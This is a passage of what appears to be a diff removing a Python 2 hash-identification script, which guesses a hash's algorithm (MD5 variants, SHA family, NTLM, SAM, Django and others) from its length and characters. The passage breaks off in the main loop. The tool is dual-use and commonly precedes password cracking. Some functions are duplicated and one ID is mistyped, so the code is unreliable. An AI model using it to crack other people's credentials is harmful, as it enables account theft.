"106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); 